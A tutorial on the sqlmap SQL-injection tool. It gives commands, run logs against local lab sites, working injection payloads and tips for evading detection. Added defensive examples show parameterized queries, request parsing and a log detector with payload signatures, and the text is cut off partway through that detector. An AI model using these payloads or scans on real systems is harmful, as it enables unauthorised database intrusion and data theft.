sqlmap Usage Tutorial
I. SQL Injection
SQL injection means inserting SQL commands into a web form submission, an input field such as a domain name, or the query string of a page request, so that the server is tricked into executing malicious SQL.
More concretely, it abuses an existing application's ability to pass SQL to the back-end database engine: by entering SQL statements into a web form, an attacker can read the database of a site with such a flaw, because the SQL no longer executes the way the designer intended.
SQL injection can occur at any position in an HTTP request.
II. sqlmap Output Levels
sqlmap's output verbosity is divided into 7 levels, from least to most detailed: 0, 1, 2, 3, 4, 5 and 6. Select a level with the -v option, e.g. -v 6 for level 6.
- 0: show only Python tracebacks, errors [ERROR] and critical messages [CRITICAL]
- 1: also show informational messages [INFO] and warnings [WARNING]
- 2: also show debug messages [DEBUG]
- 3: also show the payloads used for injection
- 4: also show the HTTP request headers
- 5: also show the HTTP response headers
- 6: also show the HTTP response body
The default level is 1; going up to -v 3 is usually enough.
III. Specifying sqlmap Targets
1. Connecting sqlmap directly to a database
(1) Server-based databases (MySQL, Oracle, etc.):
python3 sqlmap.py -d "mysql://user:password@host:port/database" -f --banner --dbs --users
Here the banner is the fingerprint, which includes detailed information about the database.
Example:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner
Output:
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:16:55 /2020-02-25/
[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:16:55] [INFO] testing MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] confirming MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] the back-end DBMS is MySQL
[18:16:55] [INFO] fetching banner
[18:16:55] [INFO] resumed: [['5.7.26']]...
[18:16:55] [INFO] actively fingerprinting MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:16:55 /2020-02-25/
The run returned basic information about the database, such as its version.
The result came back quickly, probably because earlier probing had already populated sqlmap's cache (the "resumed:" lines show it reusing stored results instead of querying again).
Another example:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users
Output:
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:20:41 /2020-02-25/
[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:20:42] [INFO] testing MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] confirming MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] the back-end DBMS is MySQL
[18:20:42] [INFO] fetching banner
[18:20:42] [INFO] resumed: [['5.7.26']]...
[18:20:42] [INFO] actively fingerprinting MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:20:42] [INFO] fetching database users
[18:20:42] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'
[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:20:42 /2020-02-25/
Compared with the previous run, the output now also lists the database users.
Another example:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users --dbs
Output:
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:25:20 /2020-02-25/
[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:25:20] [INFO] testing MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] confirming MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] the back-end DBMS is MySQL
[18:25:20] [INFO] fetching banner
[18:25:20] [INFO] resumed: [['5.7.26']]...
[18:25:20] [INFO] actively fingerprinting MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:25:20] [INFO] fetching database users
[18:25:20] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'
[18:25:20] [INFO] fetching database names
[18:25:20] [INFO] resumed: [['information_schema'], ['challenges'], ['demo'], ['demo1125'], ['demo1204'], ['dvwa'], ['jingdong'], ['mysql'], ['performance_schema'], ['pythontest'], ['security'], ['sys']]...
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys
[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:25:20 /2020-02-25/
Compared with the previous run, the output now also lists the databases.
(2) File-based databases: SQLite
2. Specifying a target URL
sqlmap can probe a single URL directly; the option is -u or --url.
The URL format is:
http(s)://targeturl/[:port/]/
For example:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=2 --banner
Output:
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:37:12 /2020-02-25/
[18:37:12] [INFO] testing connection to the target URL
[18:37:12] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:37:12] [INFO] testing if the target URL content is stable
[18:37:12] [INFO] target URL content is stable
[18:37:12] [INFO] testing if GET parameter 'id' is dynamic
[18:37:12] [INFO] GET parameter 'id' appears to be dynamic
[18:37:12] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:37:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:37:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[18:37:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:37:17] [WARNING] reflective value(s) found and filtering out
[18:37:17] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:37:17] [INFO] testing 'Generic inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:37:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:37:17] [INFO] testing 'MySQL inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:37:17] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:37:28] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:37:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:37:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:37:28] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:37:28] [INFO] target URL appears to have 3 columns in query
[18:37:28] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2' AND 7360=7360 AND 'lcZO'='lcZO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 4240 FROM(SELECT COUNT(*),CONCAT(0x716a787171,(SELECT (ELT(4240=4240,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DARZ'='DARZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 9537 FROM (SELECT(SLEEP(5)))eRXY) AND 'MqRr'='MqRr
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1033' UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x454766684a4352517a444b547a68524a6f744f4e6f7770796e6446515668715a516c424948495449,0x7176627071)-- -
---
[18:37:28] [INFO] the back-end DBMS is MySQL
[18:37:28] [INFO] fetching banner
[18:37:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:37:28] [INFO] fetched data logged to text files under 'xxxx/sqlmap/output/127.0.0.1'
[*] ending @ 18:37:28 /2020-02-25/
The output includes, for each injection point:
Type: boolean-based blind, which names the injection technique (here, boolean-based blind injection);
Payload: id=2' AND 7360=7360 AND 'lcZO'='lcZO, the query condition, i.e. the parameter value appended to the URL.
Appended to the URL, the page still loads normally, as shown in the figure.
An injection point can only be found on a dynamic page whose parameter (the id=2 after the ?) actually interacts with the database; a static page that does not touch the database cannot be probed.
The URL must not be wrapped in quotes here, otherwise sqlmap reports that the URL is invalid.
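To make "boolean-based blind" concrete from the defender's side, the following is an added example (written for this edit, not code from the article or from sqlmap). It runs the exact payload sqlmap reported above, and its "false" twin with 7360=7361, against a query built by string formatting (the Less-1 style) and against a parameterized query. The table is a constructed in-memory SQLite stand-in for the sqli-labs users table; sqlmap's inference works the same way against MySQL.

```python
import sqlite3

# Constructed stand-in for the sqli-labs "users" table (assumption: the real
# lab table has more columns; three rows are enough to show the behaviour).
ROWS = [(1, "Dumb"), (2, "Angelina"), (3, "Dummy")]

# The payload sqlmap reported for the boolean-based blind technique on this
# page, plus a "false" variant (7361): sqlmap compares the two responses.
TRUE_PAYLOAD = "2' AND 7360=7360 AND 'lcZO'='lcZO"
FALSE_PAYLOAD = "2' AND 7360=7361 AND 'lcZO'='lcZO"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_input):
    """Builds the SQL by string formatting, as a Less-1 style page does.
    The single quote in the input closes the literal, so the rest of the
    input is parsed as part of the WHERE clause."""
    sql = "SELECT id, username FROM users WHERE id = '%s'" % user_input
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input):
    """Sends the statement text and the value separately. The driver binds
    the value as data, so it is compared as a string and never parsed."""
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def demo():
    """Run every combination once and return the rows each query produced."""
    conn = make_db()
    return {
        "benign_vulnerable": lookup_vulnerable(conn, "2"),
        "benign_parameterized": lookup_parameterized(conn, "2"),
        "true_vulnerable": lookup_vulnerable(conn, TRUE_PAYLOAD),
        "false_vulnerable": lookup_vulnerable(conn, FALSE_PAYLOAD),
        "true_parameterized": lookup_parameterized(conn, TRUE_PAYLOAD),
        "false_parameterized": lookup_parameterized(conn, FALSE_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:22s} -> {rows}")
```

With the concatenated query, the true payload returns row 2 and the false payload returns nothing, which is exactly the difference sqlmap measures (the "with --string" hint in the log) to infer one bit per request. With the parameterized query both payloads return nothing, so there is no difference left to observe, while the benign value 2 still works in both versions.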
3. Reading targets from different file types
(1) To help search engines index them, many sites generate an XML sitemap; sqlmap can read targets from one with -x.
(2) Read multiple targets from a plain-text file, one per line, and probe each of them with -m.
Write a target.txt containing:
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*
www.target1.com/vuln1.php?q=foobar
Test:
python sqlmap.py -m "xxx/target.txt" --banner
(3) Save a complete HTTP request to a file and pass it with -r.
Save it to target.txt; an example of the contents:
GET /sqli-labs/Less-2/?id=3 HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug
Test:
python sqlmap.py -r "xxx/target.txt" --banner
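The -r file is just a raw HTTP/1.x request, and which parts of it sqlmap tests depends on --level (cookies only from level 2, as the cookie section below notes). As an added example, not code from the article or from sqlmap, here is a small parser for that format together with a function that lists the test surface per level. The two request texts are constructed: the GET one copies the request above with the headers trimmed, the POST one carries the Less-11 form data from the --data section; the level-3 User-Agent/Referer rule is sqlmap's documented behaviour, not something this page states.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed copies of the two request shapes used on this page. Header
# values are the page's own; the Content-Length is computed for the body.
SAMPLE_GET = """\
GET /sqli-labs/Less-2/?id=3 HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug

"""

SAMPLE_POST = """\
POST /sqli-labs/Less-11/index.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

uname=admin&passwd=admin&submit=Submit
"""


def parse_raw_request(text):
    """Split a raw HTTP/1.x request (the -r file format) into its parts."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # names are case-insensitive
    parts = urlsplit(target)
    cookies = {}
    for item in headers.get("cookie", "").split(";"):
        name, sep, value = item.strip().partition("=")
        if sep:
            cookies[name] = value
    body_params = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        body_params = dict(parse_qsl(body.strip(), keep_blank_values=True))
    return {
        "method": method,
        "version": version,
        "path": parts.path,
        "query": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "headers": headers,
        "cookies": cookies,
        "body_params": body_params,
    }


def injection_surfaces(req, level=1):
    """(location, name) pairs sqlmap tests at a given --level: GET/POST
    parameters at level 1, cookies from level 2, User-Agent/Referer from 3."""
    surfaces = [("GET", k) for k in req["query"]]
    surfaces += [("POST", k) for k in req["body_params"]]
    if level >= 2:
        surfaces += [("Cookie", k) for k in req["cookies"]]
    if level >= 3:
        surfaces += [("Header", h) for h in ("user-agent", "referer") if h in req["headers"]]
    return surfaces


if __name__ == "__main__":
    for raw in (SAMPLE_GET, SAMPLE_POST):
        req = parse_raw_request(raw)
        for level in (1, 2, 3):
            print(req["method"], req["path"], "level", level, injection_surfaces(req, level))
```

For a defender the same listing is useful in reverse: every surface it enumerates for a given level is an input your application has to validate or bind as a parameter, and raising --level only widens that list, it never narrows it.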
(4) Read the target from the configuration file sqlmap.conf with -c:
python sqlmap.py -c sqlmap.conf
IV. sqlmap Request Options
An HTTP request can use one of many methods and can carry different parameters in different locations (GET, POST, cookie, User-Agent, and so on). Often only a request that carries a specific parameter in a specific location using a specific method is a valid request.
So besides the target, sqlmap sometimes needs details of the HTTP request spelled out.
1. HTTP method
sqlmap can usually work out by itself whether to use GET or POST, but some cases call for a rarely used method such as PUT; use --method to set it.
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-2/?id=3 --banner -v 5 --method='put'
The request method changes from the default GET to PUT.
In most cases there is no need to specify the method.
2. Setting POST data
Option:
--data="xxx"
By default sqlmap sends GET requests, but supplying the data to be sent in a POST request implicitly switches it to POST. That data is treated as parameters and used for SQL injection testing.
Obtain the parameters to pass in as follows:
The resulting parameters are:
uname=admin&passwd=admin&submit=Submit
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner
3. Setting cookie options
Common options:
--cookie
--cookie-del
--load-cookies
--drop-set-cookie
Scenario 1:
The web application authenticates with a cookie and the page under test is only reachable while logged in; the login state is identified by the cookie, so the cookie is used to log in to the site.
Log in to DVWA and configure it as follows:
This gives the test URL:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
Testing without a cookie:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner
The cookie obtained is:
security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --dbs
Fetch the current database:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --current-db
Scenario 2:
You want to exploit a SQL injection flaw in a cookie value, i.e. test whether cookie injection exists.
Workflow for using cookies with sqlmap:
- log in to or browse the page
- find the cookie
- pass it to sqlmap with --cookie "<cookie value>"
Logging in and obtaining the cookie is shown below:
The cookie shown on the page differs from the one in the developer tools: the page shows the response cookie, while the developer tools show the request cookie; use the one shown on the page for testing.
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" --level 2 --banner
Notes:
Cookie injection results are only reported when --level is set to 2 or higher;
When the response carries a Set-Cookie header, sqlmap automatically uses those values in its probes; to stop it doing so, add --drop-set-cookie.
4. Setting the User-Agent
By default sqlmap sends HTTP requests with the following User-Agent:
sqlmap/1.0-dev-xxxx (http://sqlmap.org)
To set a specific User-Agent, use:
--user-agent="<user-agent string>"
Specify the header:
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" --level 6 --banner --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36"
Use a random User-Agent:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/index.php --cookie "uname=admin" --level 2 --banner --random-agent -v 5 --banner
Test again:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-18/index.php --random-agent -v 5 --banner --level 3
5. Setting a proxy
Proxy options in sqlmap:
- --proxy: address of the HTTP proxy server; format: --proxy http(s)://ip[:port]
- --proxy-cred: proxy authentication credentials; format: --proxy-cred user:pwd
- --proxy-file: load a list of proxies from a file
- --ignore-proxy: ignore the system-wide HTTP(S) proxy settings, e.g. when the target is on the local network
6. Setting a delay
Option:
--delay 0
During a scan sqlmap sends a large number of probe payloads to the target; at the default pace, sending requests this fast can trigger alerts on the target side. To avoid that, a delay between sqlmap's requests can be set for the scan.
No delay is set by default.
7. Setting a timeout
Option:
--timeout 30
The number of seconds to wait before treating an HTTP request as timed out; the value is a float, e.g. 10.5 seconds.
The default is 30 seconds.
8. Setting the number of retries
Option:
--retries 3
Sets how many times a timed-out request is retried.
The default is 3 retries.
9. Randomizing a parameter
Option:
--randomize <parameter name>
sqlmap can be given the name of a parameter whose value is changed randomly on every request; the random value keeps the length and type of the original value supplied.
10. Ignoring HTTP 401
If the site under test occasionally returns HTTP 401 and you want to ignore it and keep testing without supplying proper credentials, use --ignore-401 to ignore the unauthorized error.
11. Avoiding a block for too many bad requests
A server may block a client that it sees sending too many malformed requests, and sqlmap's tests generate many such requests; to avoid being blocked, sqlmap can send a few normal requests from time to time to confuse the server.
Options:
- --safe-url: a safe URL to visit every so often
- --safe-post: POST data to send when visiting the safe URL
- --safe-req: load the safe HTTP request from a file
- --safe-freq: the number of test requests after which the safe URL is visited
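Sections 4, 6 and 11 above are all about the traces a scan leaves: the default User-Agent, the request rate (--delay) and the ratio of broken requests (--safe-url). As an added example written for this edit (not code from the article or from sqlmap), here is a detection pass over Apache combined-format access log lines that scores each client on those three signals plus the payload families sqlmap reported for the Less-1 target. The log lines are constructed: the sqlmap User-Agent string, the response sizes, and the 500 responses are assumptions, while the id= values are the reported payloads URL-encoded. The thresholds are illustrative and should be tuned to real traffic.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed Apache "combined" log lines (not real traffic). The sqlmap
# User-Agent value, sizes and the two 500s are assumptions; the id= values
# are the payloads sqlmap reported for the Less-1 run, URL-encoded.
SAMPLE_LOG = '''\
10.0.0.5 - - [25/Feb/2020:18:30:00 +0800] "GET /sqli-labs/Less-1/?id=2 HTTP/1.1" 200 1523 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36"
127.0.0.1 - - [25/Feb/2020:18:37:12 +0800] "GET /sqli-labs/Less-1/?id=2 HTTP/1.1" 200 1523 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [25/Feb/2020:18:37:17 +0800] "GET /sqli-labs/Less-1/?id=2%27%20AND%207360%3D7360%20AND%20%27lcZO%27%3D%27lcZO HTTP/1.1" 200 1523 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [25/Feb/2020:18:37:17 +0800] "GET /sqli-labs/Less-1/?id=2%27%20AND%207360%3D7361%20AND%20%27lcZO%27%3D%27lcZO HTTP/1.1" 200 1410 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [25/Feb/2020:18:37:18 +0800] "GET /sqli-labs/Less-1/?id=2%27%20AND%20%28SELECT%209537%20FROM%20%28SELECT%28SLEEP%285%29%29%29eRXY%29%20AND%20%27MqRr%27%3D%27MqRr HTTP/1.1" 200 1523 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [25/Feb/2020:18:37:28 +0800] "GET /sqli-labs/Less-1/?id=-1033%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716a787171%2C0x4547%2C0x7176627071%29--%20- HTTP/1.1" 200 1601 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [25/Feb/2020:18:37:28 +0800] "GET /sqli-labs/Less-1/?id=2%27 HTTP/1.1" 500 612 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [25/Feb/2020:18:37:28 +0800] "GET /sqli-labs/Less-1/?id=2%22 HTTP/1.1" 500 612 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
SQLMAP_UA = re.compile(r"^sqlmap/|sqlmap\.org", re.I)

# One pattern per payload family sqlmap reported above.
SIGNATURES = {
    "numeric tautology (boolean-based blind)": re.compile(r"\bAND\s+\d+=\d+", re.I),
    "SLEEP() (time-based blind)": re.compile(r"\bSLEEP\s*\(", re.I),
    "UNION SELECT (UNION query)": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "CONCAT(0x...) marker (error-based/UNION)": re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I),
}


def peak_requests(times, window_s=10):
    """Largest number of requests from one client inside any window_s-second span."""
    times = sorted(times)
    best = j = 0
    for i in range(len(times)):
        while j < len(times) and (times[j] - times[i]).total_seconds() <= window_s:
            j += 1
        best = max(best, j - i)
    return best


def analyze(log_text, window_s=10, burst_threshold=20, error_threshold=0.5):
    """Per-client summary: tool User-Agent, payload signatures, burst rate and
    error ratio. Thresholds are illustrative assumptions, not sqlmap facts."""
    blank = lambda: {"total": 0, "errors": 0, "times": [], "sqlmap_ua": False,
                     "payload_requests": 0, "signatures": set()}
    per_client = defaultdict(blank)
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than crash on odd lines
        c = per_client[m["ip"]]
        c["total"] += 1
        c["times"].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
        if int(m["status"]) >= 400:
            c["errors"] += 1
        if SQLMAP_UA.search(m["ua"]):
            c["sqlmap_ua"] = True
        decoded = unquote_plus(m["target"])  # payloads arrive URL-encoded
        hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if hits:
            c["payload_requests"] += 1
            c["signatures"].update(hits)
    report = {}
    for ip, c in per_client.items():
        peak = peak_requests(c["times"], window_s)
        ratio = c["errors"] / c["total"]
        flagged = (c["sqlmap_ua"] or c["payload_requests"] >= 2
                   or (peak >= burst_threshold and ratio >= error_threshold))
        report[ip] = {"total": c["total"], "sqlmap_ua": c["sqlmap_ua"],
                      "payload_requests": c["payload_requests"],
                      "signatures": sorted(c["signatures"]),
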